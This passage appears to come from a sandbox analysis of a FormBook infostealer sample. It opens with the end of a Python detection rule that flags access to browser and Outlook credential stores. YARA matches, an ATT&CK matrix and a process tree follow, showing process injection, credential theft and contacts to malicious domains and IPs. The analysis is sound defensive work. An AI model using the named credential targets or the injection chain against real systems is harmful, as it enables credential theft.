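          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data", "file"),
    Event(r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", OUTLOOK_KEY, "key"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"ALERT {f.reason}: {f.target}")
```

Keying the rule on which process owns the store, rather than on whether the process is a trusted Microsoft binary, is what makes it useful here: help.exe is a legitimate signed file under SysWOW64 and only became a stealer because FormBook was injected into it, so path or signature reputation alone would clear it.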

Remote Access Functionality

Source: Yara match  File source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000003.00000002.990094154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000006.00000002.3290778849.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000006.00000002.3290725167.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000006.00000002.3288875125.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.992572744.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000008.00000002.3292767539.0000000004AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.998384257.0000000002690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000005.00000002.3290872788.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques flagged for this sample, grouped by tactic. The digit strings are the signature-count badges exactly as they appear in the matrix cells.

Persistence:           1 DLL Side-Loading
Privilege Escalation:  412 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading
Defense Evasion:       11 Masquerading; 11 Disable or Modify Tools; 51 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading
Credential Access:     1 OS Credential Dumping
Discovery:             131 Security Software Discovery; 2 Process Discovery; 51 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 123 System Information Discovery
Collection:            1 Email Collection; 1 Archive Collected Data; 1 Data from Local System
Command and Control:   1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol

No technique is flagged under Reconnaissance, Resource Development, Initial Access, Execution, Lateral Movement, Exfiltration or Impact; those columns of the matrix hold only unselected technique names.

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1640362  Sample: mKv3sKQ5Q4E7waF.exe  Startdate: 17/03/2025  Architecture: WINDOWS  Score: 100

Top-level nodes:
  Network: www.quantumxr.xyz; www.lingkungan.xyz (Performs DNS queries to domains with low reputation); 17 other IPs or domains
  Signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Yara detected FormBook; 4 other signatures

Process tree (node numbers as in the graph; "injected" marks a process the parent wrote code into rather than started; numeric badges from the graph are kept in brackets):
  10 mKv3sKQ5Q4E7waF.exe [4] (started)
     Dropped: C:\Users\user\...\mKv3sKQ5Q4E7waF.exe.log, ASCII
     Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
     17 mKv3sKQ5Q4E7waF.exe (started)
        Signatures: Maps a DLL or memory area into another process
        22 vnV7v1GankdEyS2eDT.exe (injected)
           Signatures: Found direct / indirect Syscall (likely to bypass EDR)
           29 help.exe [13] (started)
              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
              32 vnV7v1GankdEyS2eDT.exe (injected)
                 Network: www.lingkungan.xyz 13.248.169.48, ports 52864, 52865, 52866, AMAZON-02US, United States; www.klass.team 77.222.42.122, ports 52914, 52915, 52916, SWEB-ASRU, Russian Federation; 11 other IPs or domains
                 Signatures: Found direct / indirect Syscall (likely to bypass EDR)
              36 firefox.exe (started)
     20 powershell.exe [23] (started)
        Signatures: Loading BitLocker PowerShell Module
        25 WmiPrvSE.exe (started)
        27 conhost.exe (started)
  14 svchost.exe [1 1] (started)
     Network: 127.0.0.1 unknown unknown
